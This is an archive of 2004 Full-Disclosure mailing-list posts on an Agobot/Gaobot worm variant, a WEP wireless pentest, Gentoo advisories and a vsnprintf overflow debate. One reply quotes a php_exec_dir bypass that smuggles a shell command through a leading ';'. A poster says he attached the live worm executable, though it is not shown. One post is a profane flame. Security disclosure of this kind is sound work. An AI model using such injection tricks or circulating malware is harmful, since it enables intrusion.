OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] RE: M$ - so what should they do?

bills.bitchhushmail.com
Date: Wed Jun 23 2004 - 19:30:05 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

He still does not get it. Despite his bizzare ability to bloat his prose
with nothing, probably so from coming from the bloated code school of
his principal, and he still says nothing. What he isn't is a professional.
A professional anything. Rather a whore from the pimp stable of his bitch
master. Hey I go where the money is. It's not a religion. I don't care.
Give me the money. Take a 5 minute break. Cool off. I can also switch
to where money is today or tomorrow. Exactly like the whore stripper.
I am good person, but hey I go where the money is. Relax whoring isn't
relgion, take 5 and cool down. I'll make my money now and quit down the
road and get married and then really become someone. ha ha ha ha ha

These are the words of a professional whore, not a professional admin,
 security, tech, analysist. The only security that he really nows is
about lining his pocket.

Give him nickel and he'll say the other systems are the worst.
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDaIKQACgkQ9hJzGKhH2Le3BACgrMbcchg3PF5YFH4KIklgc+16EGwA
oJi6MRzqW3+oYQoaTfnU1MObUuw8
=aog+
-----END PGP SIGNATURE-----

Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services.php?subloc=messenger&l=434

Promote security and make money with the Hushmail Affiliate Program:
http://www.hushmail.com/about.php?subloc=affiliate&l=427

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] M$ - so what should they do?

From: Ciro Spider-Man (geekcirogmail.com)
Date: Thu Jun 24 2004 - 04:12:41 CDT

On Tue, 22 Jun 2004 09:04:37 +1200, Stuart Fox (DSL AK)
<stuartfdatacom.co.nz> wrote:
>
>
>
> >
> > How about changing the ".exe" convention? Making a file
> > executable by it's "extension" probably causes a lot of
> > opportunities for problems, doesn't it?
> >
> > Also, the magic file names, like "CON" and "AUX" should go away.
> >
>
> No way! Am I the only person who still uses "copy con filename.txt" to
> create scripts and such at the command line? Please tell me I'm not?
>

I don't use it to create scripts, but I do use it. Frequently use the
filehandles on unix boxen, too, for that matter. Who needs a
fullscreen editor? ;)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] trouble with wireless pentest

From: zcrips xrabbitz (zcrips_xrabbitzhotmail.com)
Date: Thu Jun 24 2004 - 06:16:15 CDT

hi everyone,
      i have been taking on my first large and blind wireless pentest
and i
have nearly become lost in the jaws of a wireless network and would
appreciate any help. first i'lll state what i have so far done and seen
 
the network was encrypted but with wep and large traffic so i was able
to
bruteforce the key
The network in focus is quite large with multiple subnets and lots of
"firewalls"
 
These I did.
 
Using kismet I sniffed a whole lot of packets. And decoded them with the

found wep key
 
Then using my conventional ettercap and ethereal I looked through the
packets.
i sniffed a lot more with ettereal and looked through them for a similar
mac
address but all packets
had i local (destination) ip and mac address
 
Now The Problem.
 
I tried to connect to the net work
 
I used a nice ip to match one on the network
(8.5) i changed mac addresses to match the host i was spoofing.
 
then i tried to route packets to another client
which failed with the network unreachable error
i tried a traceroute to my target client but it failed too with the same

error
 
i used ettercap to passively watch traffic and came up with a
comprehensive
list of ip/mac addresses and tried to spoof most of them but still my
packets didn't get routed
i tried using etterape to watch traffic flow and come up with a route
but i
figure out that nearly all traffic was internal most hosts were
connecting
to each other
 
HELP:
    HOW CAN I ROUTE PACKETS THROUGH TO OTHER CLIENTS OR BECOME A CLIENT
OR IS THERE A BETTER WAY I COULD DO THIS WHOLE PENTEST FROM THE BEGINING
PLS ANY HELP WOULD BE APPRECIATED.
 
 
ZIPPERS CRIPS
 
_________________________________________________________________
 
The Zcrips Inc
-----------------------------------------------------------------
a man is only limited by his imaginative abilities
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Spammers Using Spyware To Fool Users

From: Helmut Hauser (helmut_hauserhotmail.com)
Date: Thu Jun 24 2004 - 06:37:55 CDT

Could that be the reason that I see a whole explosion in Spy and Malware
infections right now ?

http://www.techweb.com/wire/story/TWB20040623S0007

Helmut Hauser

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Michael Young (mikeyoungmilestechnologies.com)
Date: Thu Jun 24 2004 - 07:57:06 CDT

Yesterday a large client of ours was taken down by what appears to be a
Korgo variant, but I have been unable to locate any information on this
worm. From what we have discovered, the main process is 'VDisp.exe'. It is
spreading through unpatched systems vulnerable to the LSASS exploit, and
propagates itself through a serious of randomly chosen ports. The worm
creates randomly generated services that initialize the process, and also
creates a registry entry in RunServices and Run to load. I am anxious to
hear any feedback anyone has regarding this issue as we are still attempting
to reduce network traffic and alleviate any remaining issues. I have
attached a copy of the executable (rename to .exe).

 

Thank you,

 

Michael Young

IT Consultant

Miles Technologies

(800)-496-8001

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: your mail

Bart.Lansingkohls.com
Date: Thu Jun 24 2004 - 08:33:51 CDT

Unitl your crappy office filter is smart enough to know that that is a
potential anonymizer and blocks it as well...like ours does.

Cheers

Bart Lansing
Manager, Desktop Services
Kohl's IT

full-disclosure-adminlists.netsys.com wrote on 06/23/2004 12:04:01 PM:

>
>
> This really isn't that new.
> For years you have been able to do this with babelfish.altavista.com
also.
>
> Simply goto translat.google.com or babelfish.altavista.com type in the
> website you would like to visit and select a language to translate from
->
> to the langauge you know the website is currently written in and when
you
> submit your query it should by default notice it doesn't need to
translate
> the site or it thinks the site has been translated fairly quickly and it
> hands you the website.
>
>
> This is great for your crappy corporate filters.
>
> :)
>
> > http://exploit.wox.org/tools/googleproxy.html
>
> -Daniel Uriah Clemens
>
> Esse quam videra
> (to be, rather than to appear)
> -Moments of Sorrow are Moments of Sobriety
> { o)2059686335 c)2055676850 }
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

CONFIDENTIALITY NOTICE:
This is a transmission from Kohl's Department Stores, Inc.
and may contain information which is confidential and proprietary.
If you are not the addressee, any disclosure, copying or distribution or use of the contents of this message is expressly prohibited.
If you have received this transmission in error, please destroy it and notify us immediately at 262-703-7000.

CAUTION:
Internet and e-mail communications are Kohl's property and Kohl's reserves the right to retrieve and read any message created, sent and received. Kohl's reserves the right to monitor messages by authorized Kohl's Associates at any time
without any further consent.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Cedric Blancher (blanchercartel-securite.fr)
Date: Thu Jun 24 2004 - 09:03:47 CDT

Le jeu 24/06/2004 à 14:57, Michael Young a écrit :
> Yesterday a large client of ours was taken down by what appears to be
> a Korgo variant, but I have been unable to locate any information on
> this worm. From what we have discovered, the main process is
> ‘VDisp.exe’. It is spreading through unpatched systems vulnerable to
> the LSASS exploit, and propagates itself through a serious of randomly
> chosen ports.

Korgo exploits a buffer overflow within FTP daemon installed by Sasser.
That would mean your client systems were previously infected by
Sasser...

--
http://www.netexit.com/~sid/
PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
>> Hi! I'm your friendly neighbourhood signature virus.
>> Copy me to your signature file and help me spread!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Michael Young (mikeyoungmilestechnologies.com)
Date: Thu Jun 24 2004 - 09:14:19 CDT

The worm clearly exploits the LSASS overflow and is not spreading through
the FTP dameon left by Sasser.

-----Original Message-----
From: Cedric Blancher [mailto:blanchercartel-securite.fr]
Sent: Thursday, June 24, 2004 10:04 AM
To: Michael Young
Cc: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

Le jeu 24/06/2004 à 14:57, Michael Young a écrit :
> Yesterday a large client of ours was taken down by what appears to be
> a Korgo variant, but I have been unable to locate any information on
> this worm. From what we have discovered, the main process is
> ‘VDisp.exe’. It is spreading through unpatched systems vulnerable to
> the LSASS exploit, and propagates itself through a serious of randomly
> chosen ports.

Korgo exploits a buffer overflow within FTP daemon installed by Sasser.
That would mean your client systems were previously infected by
Sasser...

--
http://www.netexit.com/~sid/
PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
>> Hi! I'm your friendly neighbourhood signature virus.
>> Copy me to your signature file and help me spread!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Cedric Blancher (blanchercartel-securite.fr)
Date: Thu Jun 24 2004 - 09:28:23 CDT

Le jeu 24/06/2004 à 16:14, Michael Young a écrit :
> The worm clearly exploits the LSASS overflow and is not spreading through
> the FTP dameon left by Sasser.

Oups... My mistake... I messed with Korgo and Dabber...

--
http://www.netexit.com/~sid/
PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
>> Hi! I'm your friendly neighbourhood signature virus.
>> Copy me to your signature file and help me spread!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Heather M. Guse Bryan (hbryandpntech.com)
Date: Thu Jun 24 2004 - 08:53:46 CDT

http://www.f-secure.com/weblog/
  -----Original Message-----
  From: Michael Young [mailto:mikeyoungmilestechnologies.com]
  Sent: Thursday, June 24, 2004 7:57 AM
  To: full-disclosurelists.netsys.com
  Subject: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

  Yesterday a large client of ours was taken down by what appears to be a
Korgo variant, but I have been unable to locate any information on this
worm. From what we have discovered, the main process is ‘VDisp.exe’. It is
spreading through unpatched systems vulnerable to the LSASS exploit, and
propagates itself through a serious of randomly chosen ports. The worm
creates randomly generated services that initialize the process, and also
creates a registry entry in RunServices and Run to load. I am anxious to
hear any feedback anyone has regarding this issue as we are still attempting
to reduce network traffic and alleviate any remaining issues. I have
attached a copy of the executable (rename to .exe).

  Thank you,

  Michael Young

  IT Consultant

  Miles Technologies

  (800)-496-8001

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] flaw in php_exec_dir patch

From: npguy (npguywebsurfer.com.np)
Date: Thu Jun 24 2004 - 09:47:24 CDT

is your safe mode on? .. whats ur platorm.
give more details!

On Wednesday 23 June 2004 07:05 am, VeNoMouS wrote:
> Found a issue last night while testing php_exec_dir patch
>
> if you do the following
>
> $blah=`ps aux`;
> echo nl2br($blah);
>
> php_exec_dir will block the call if you have set the exec_dir parm in php
> or apache
>
> anyway.... if you do this
>
> $blah=`;ps aux`;
> echo nl2br($blah);
>
> it bypasses the exec block and excutes the ps due to the ';', as bash
> interrupts ';' as a new cmd, ive emailed the author but no response.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Oliver Heinz (h1oarago.de)
Date: Thu Jun 24 2004 - 10:14:55 CDT

Hello,

we also came across a system with a variant of Korgo/Padobot that was NOT
infected with sasser before!
Infection possibly took place via HTTP, a file containing the virus was
found in the temporary internet files.
Looks like this new padobot is also able to spread via Internet Expolrer
vulnerabilities .

Regards, Oliver Heinz

  -------------------------------------------------------------------------
 | arago, | Oliver Heinz |
 | Institut fuer komplexes | Bereichsleiter Systembetrieb & Security |
 | Datenmanagement AG | eMail: heinzarago.de |
 | Am Niddatal 3 | |
 | 60488 Frankfurt am Main | http://www.arago.de/ |
 | Tel: +49-69-40568-401 | PGP-Fingerprint: a5de d4b4 46b3 4d8b 2646 |
 | Fax: +49-69-40568-111 | d4d0 e5fd d842 cc4e 7315 |
  -------------------------------------------------------------------------

  Testen Sie jetzt Ihre IT-Sicherheit: http://portscan.netlimes.de/

On Thu, 24 Jun 2004, Cedric Blancher wrote:

> Date: Thu, 24 Jun 2004 16:03:47 +0200
> From: Cedric Blancher <blanchercartel-securite.fr>
> To: Michael Young <mikeyoungmilestechnologies.com>
> Cc: full-disclosurelists.netsys.com
> Subject: Re: [Full-Disclosure] New Worm Discovery - Potential Korgo
> Variant
>
> Le jeu 24/06/2004 à 14:57, Michael Young a écrit :
> > Yesterday a large client of ours was taken down by what appears to be
> > a Korgo variant, but I have been unable to locate any information on
> > this worm. From what we have discovered, the main process is
> > ‘VDisp.exe’. It is spreading through unpatched systems vulnerable to
> > the LSASS exploit, and propagates itself through a serious of randomly
> > chosen ports.
>
> Korgo exploits a buffer overflow within FTP daemon installed by Sasser.
> That would mean your client systems were previously infected by
> Sasser...
>
> --
> http://www.netexit.com/~sid/
> PGP KeyID: 157E98EE FingerPrint: FA62226DA9E72FA8AECAA240008B480E157E98EE
> >> Hi! I'm your friendly neighbourhood signature virus.
> >> Copy me to your signature file and help me spread!
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Evidence of a ISC being hacked?

From: VX Dude (vxdude2003yahoo.com)
Date: Thu Jun 24 2004 - 10:27:11 CDT

http://www.kb.cert.org/vuls/id/654390

Apparently one of the new DHCP vulnerabilities stems
from the following code found in a header file.

#define vsnprintf(buf, size, fmt, list) vsprintf (buf,
fmt, list)

Why would any coder replace a more secure function
with a less secure function? Personally I don't see
any reason except to backdoor the software. If so,
then is this evidence that ISC has been hacked and
there backdoored? Are they keeping the incident
quiet?

Yeah I'm paranoid, but someone has to be ^_*

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] New Viruses

From: VX Dude (vxdude2003yahoo.com)
Date: Thu Jun 24 2004 - 10:33:17 CDT

Could you guys stop sending me Beagle.X? I already
have enough copies of that. Could I make requests of
which viriises I would like to receive?

hahahahahahahahahahahahahahhohohohohohohohoh

Crapfully yours,
Stiny

_______________________________________________
Full-Disclosure - We belive in it cause we're evil.
Charter:
http://lists.netsys.cn/full-disclosure-charter.html

                
__________________________________
Do you Yahoo!?
Yahoo! Mail Address AutoComplete - You start. We finish.
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200406-18 ] gzip: Insecure creation of temporary files

From: Kurt Lieber (kliebergentoo.org)
Date: Thu Jun 24 2004 - 10:05:32 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: gzip: Insecure creation of temporary files
      Date: June 24, 2004
      Bugs: #54890
        ID: 200406-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

gzip contain a bug potentially allowing an attacker to execute
arbitrary commands.

Background
==========

gzip (GNU zip) is popular compression program. The included gzexe
utility allows you to compress executables in place and have them
automatically uncompress and execute when you run them.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 app-arch/gzip <= 1.3.3-r3 >= 1.3.3-r4

Description
===========

The script gzexe included with gzip contains a bug in the code that
handles tempfile creation. If the creation of a temp file fails when
using gzexe fails instead of bailing out it executes the command given
as argument.

Impact
======

This could lead to priviege escalation by running commands under the
rights of the user running the self extracting file.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.

Resolution
==========

All gzip users should upgrade to the latest stable version:

    # emerge sync

    # emerge -pv ">=app-arch/gzip-1.3.3-r4"
    # emerge ">=app-arch/gzip-1.3.3-r4"

Additionally, once the upgrade is complete, all self extracting files
created with earlier versions gzexe should be recreated, since the
vulnerability is actually embedded in those executables.

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

     http://security.gentoo.org/glsa/glsa-200406-18.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFA2u28JPpRNiftIEYRAjlQAJ9s7wy6pONW5wyEttXAMsU4N9/UtQCfRC7W
7UMU9I8ls2SBI7JckNM2wKE=
=+lTo
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: joe smith (joejoesmith.homeip.net)
Date: Thu Jun 24 2004 - 10:27:44 CDT

Kaspersky detect it as Backdoor.Agobot.gen. So another one of the many
other Agobot variants.

Michael Young wrote:

> Yesterday a large client of ours was taken down by what appears to be
> a Korgo variant, but I have been unable to locate any information on
> this worm. From what we have discovered, the main process is
> ‘VDisp.exe’. It is spreading through unpatched systems vulnerable to
> the LSASS exploit, and propagates itself through a serious of randomly
> chosen ports. The worm creates randomly generated services that
> initialize the process, and also creates a registry entry in
> RunServices and Run to load. I am anxious to hear any feedback anyone
> has regarding this issue as we are still attempting to reduce network
> traffic and alleviate any remaining issues. I have attached a copy of
> the executable (rename to .exe).
>
>
>
> Thank you,
>
>
>
> Michael Young
>
> IT Consultant
>
> Miles Technologies
>
> (800)-496-8001
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

From: Michael Young (mikeyoungmilestechnologies.com)
Date: Thu Jun 24 2004 - 09:39:06 CDT

Thank you for bringing that to my attention. Here is the attachment.
Again, rename to .exe

-----Original Message-----
From: Peter Kosinar [mailto:gooberksp.sk]
Sent: Thursday, June 24, 2004 10:36 AM
To: Michael Young
Subject: Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant

> creates a registry entry in RunServices and Run to load. I am anxious to
> hear any feedback anyone has regarding this issue as we are still
attempting
> to reduce network traffic and alleviate any remaining issues. I have
> attached a copy of the executable (rename to .exe).

Are you sure you didn't forget to attach the attachment ? Or was it
stripped from the mail somewhere on the route ?

Your sincerely,

Peter Kosinar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: MCAFEE E-MAIL SCAN ALERT!~RE: [FULL-DISCLOSURE] NEW WORM DISCOVERY - POTENTIAL KORGO VARIANT

From: Chontzopoulos Dimitris (dchontzoabc.gr)
Date: Thu Jun 24 2004 - 11:43:24 CDT

McAfee says <W32/Gaobot.worm.gen.j>

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Michael Young
> Sent: Thursday, June 24, 2004 5:39 PM
> To: 'Peter Kosinar'; full-disclosurelists.netsys.com
> Subject: MCAFEE E-MAIL SCAN ALERT!~RE: [FULL-DISCLOSURE] NEW WORM DISCOVERY - POTENTIAL KORGO VARIANT
>
>
> Attachment file : VDisp.save
> Virus name: W32/Gaobot.worm.gen.j
> Action taken : Unable to Clean...
>
> Attachment file : VDisp.save
> Virus name: W32/Gaobot.worm.gen.j
> Secondary Action taken : Moved...
>
> Thank you for bringing that to my attention. Here is the attachment.
> Again, rename to .exe
>
> -----Original Message-----
> From: Peter Kosinar [mailto:gooberksp.sk]
> Sent: Thursday, June 24, 2004 10:36 AM
> To: Michael Young
> Subject: Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant
>
> > creates a registry entry in RunServices and Run to load. I am anxious to
> > hear any feedback anyone has regarding this issue as we are still
> attempting
> > to reduce network traffic and alleviate any remaining issues. I have
> > attached a copy of the executable (rename to .exe).
>
> Are you sure you didn't forget to attach the attachment ? Or was it
> stripped from the mail somewhere on the route ?
>
> Your sincerely,
>
> Peter Kosinar
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
SV: MCAFEE E-MAIL SCAN ALERT!~RE: [FULL-DISCLOSURE] NEW WORM DISCOVERY - POTENTIAL KORGO VARIANT

From: Peter Kruse (krusekrusesecurity.dk)
Date: Thu Jun 24 2004 - 12:34:52 CDT

Hi,

>McAfee says <W32/Gaobot.worm.gen.j>

Yes, this is indeed a new Gaobot/Agobot variant.

Regards
Peter Kruse
http://www.csis.dk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: New Worm Discovery - Potential Korgo Variant

From: Helmut Hauser (helmut.hauserintraplan.de)
Date: Thu Jun 24 2004 - 13:01:04 CDT

In my opinion
this is an unknown Agobot variant [as told from NAI]

TrendMicro calls it:
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=DOS_AGOBOT%2EGEN
(it changes the host file)
It is packed with one of the latest PECompact.

Put itself in the usual suspect run keys + services as Display Driver
VDisp.exe

Run autoruns from www.sysinternals.com, there are the entries for startup

Would it never stop ?

The author of agobot was (thankfully) arrested, but the source is in the
wild
and some script kiddies are still there :(

Helmut Hauser

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

Valdis.Kletnieksvt.edu
Date: Thu Jun 24 2004 - 12:54:52 CDT

On Thu, 24 Jun 2004 08:27:11 PDT, VX Dude <vxdude2003yahoo.com> said:
> http://www.kb.cert.org/vuls/id/654390
>
> Apparently one of the new DHCP vulnerabilities stems
> from the following code found in a header file.
>
> #define vsnprintf(buf, size, fmt, list) vsprintf (buf,
> fmt, list)
>
> Why would any coder replace a more secure function
> with a less secure function? Personally I don't see
> any reason except to backdoor the software.

Hmm.. are you perchance new to software development? ;)

Quoting one of the advisories:

   VU#654390 discusses C include files for systems that do not support
   the bounds checking vsnprintf() function. These files define the
   bounds checking vsnprintf() to the non-bounds checking vsprintf()
   function. Since vsprintf() is a function that does not check bounds,
   the size is discarded, creating the potential for a buffer overflow
   when client data is supplied. Note that the vsnprintf() statements are
   defined after the vulnerable code that is discussed in VU#317350.

It's easier to just #define the critter than to re-re-invent the C code
for vsnprintf() (which isn't always trivial, as your vsnprintf() has to play
nice with the vendor's stdio - this can be .. umm... "interesting" if the
innards of the vendor stdio are more bizzare than usual...

Go ahead - go and re-write a vsnprintf, and compare that to the time it
takes to do the #define, and remember that this situation almost certainly
came up because some *other* coder had changed a vsprintf() to a vsnprintf()
for the obvious security reasons, it built OK on the other coder's test box,
they released a -rc release candidate, and the build broke on OTHER systems
because there wasn't a vsnprintf() in the vendor libc - and your boss is
telling you TO GET THE THING TO BUILD, NOW....

The programmer who is willing to swear on a Bible that they have *never* in
their professional careers done something like this because they were in a
time crunch is either a newbie or a complete liar.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFA2xVscC3lWbTT17ARAtPMAKDqrL+7I82HFBvOOYIx9ywpBCAT9wCgqXSA
oxfzSJSs6WMUKuktlS3n408=
=fR2w
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

From: VX Dude (vxdude2003yahoo.com)
Date: Thu Jun 24 2004 - 13:22:18 CDT

--- Valdis.Kletnieksvt.edu wrote:
<snip>
> It's easier to just #define the critter than to
> re-re-invent the C code
> for vsnprintf() (which isn't always trivial, as your
> vsnprintf() has to play
> nice with the vendor's stdio - this can be .. umm...
> "interesting" if the
> innards of the vendor stdio are more bizzare than
> usual...
<snip>

Good point, personally I wouldn't think that making a
small wrapper would take that long, but then again I
havent done it, and I havent done it under stress and
a time crunch. I code for fun and not profit which is
pretty stress free.

-Stiny

                
__________________________________
Do you Yahoo!?
New and Improved Yahoo! Mail - Send 10MB messages!
http://promotions.yahoo.com/new_mail

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

Valdis.Kletnieksvt.edu
Date: Thu Jun 24 2004 - 14:38:27 CDT

On Thu, 24 Jun 2004 11:22:18 PDT, VX Dude said:

> Good point, personally I wouldn't think that making a
> small wrapper would take that long, but then again I
> havent done it, and I havent done it under stress and
> a time crunch. I code for fun and not profit which is
> pretty stress free.

Writing a small wrapper doesn't do anything any better than
just using a #define - the *basic* problem is that there's no way
for any wrapper or preprocessor magic to know the "right" answer
to the most crucial difference - vsnprintf takes a 'length' parameter,
and you have 2 basic choices:

1) The wrapper/define/handwaving discards it and prays.

2) The replacement function does a proper job of doing a full enough
emulation of vsnprintf to keep track of "length so far" and stop
when it gets full (not as easy as you might think - for fun, compute
how many bytes this takes:

   vsprintf(target,"%#'LG",foo);

(Note the evilness involved in the ' flag, which is locale-dependent ;)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFA2y2zcC3lWbTT17ARAr7zAKDJ261SguKTJAH/faG+1wKGvF8dMgCdFOms
8iOwY5LWTHpPMJO5MNEaxGM=
=cOfP
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200406-19 ] giFT-FastTrack: remote denial of service attack

From: Thierry Carrez (koongentoo.org)
Date: Thu Jun 24 2004 - 15:39:22 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200406-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Low
     Title: giFT-FastTrack: remote denial of service attack
      Date: June 24, 2004
      Bugs: #54452
        ID: 200406-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

There is a vulnerability where a carefully crafted signal sent to the
giFT-FastTrack plugin will cause the giFT daemon to crash.

Background
==========

giFT-FastTrack is a plugin for the giFT file-sharing application. It
allows giFT users to connect to the fasttrack network to share files.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-p2p/gift-fasttrack <= 0.8.6 >= 0.8.7

Description
===========

Alan Fitton found a vulnerability in the giFT-FastTrack plugin in
version 0.8.6 and earlier. It can be used to remotely crash the giFT
daemon.

Impact
======

Attackers may use this vulnerability to perform a Denial of Service
attack against the giFT daemon. There is no risk of code execution.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version.

Resolution
==========

All users should upgrade to the latest available version of
gift-fasttrack:

    # emerge sync

    # emerge -pv ">=net-p2p/gift-fasttrack-0.8.7"
    # emerge ">=net-p2p/gift-fasttrack-0.8.7"

References
==========

  [ 1 ] giFT-FastTrack announcement
        http://gift-fasttrack.berlios.de/

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

     http://security.gentoo.org/glsa/glsa-200406-19.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Technologies, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFA2zv6vcL1obalX08RAvglAJ9ps20fsJt68KOm66rRk/9W3KZfGQCZAQ83
ZcoXMOoCfk3geRVrx6Y2MqY=
=ikRU
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Evidence of a ISC being hacked?

From: Pavel Kankovsky (peakargo.troja.mff.cuni.cz)
Date: Thu Jun 24 2004 - 16:39:56 CDT

On Thu, 24 Jun 2004 Valdis.Kletnieksvt.edu wrote:

> It's easier to just #define the critter than to re-re-invent the C code
> for vsnprintf() (which isn't always trivial, as your vsnprintf() has to play
